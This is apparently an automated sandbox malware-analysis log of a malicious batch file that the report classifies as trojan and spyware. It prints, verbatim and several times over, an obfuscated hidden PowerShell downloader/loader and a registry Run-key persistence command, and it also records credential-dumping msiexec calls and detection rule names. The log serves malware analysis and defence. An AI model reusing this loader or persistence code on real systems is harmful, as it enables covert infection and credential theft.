                Source: Process Memory Space: powershell.exe PID: 6112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@22/13@3/3
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,16_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,13_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,13_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Rgnes.UndJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-JTPTLW
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xio0a2hk.sne.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6112
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3980
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000009.00000002.3056539906.00000000227A0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 0000000D.00000002.2428825270.0000000004685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_15-32920
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKU_0001710-1-2024-SX-3762.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTria
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,ms
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\cgtcjah"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\miynksssgv"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\pclglkctcdois"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hvidtning81" /t REG_EXPAND_SZ /d "%Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
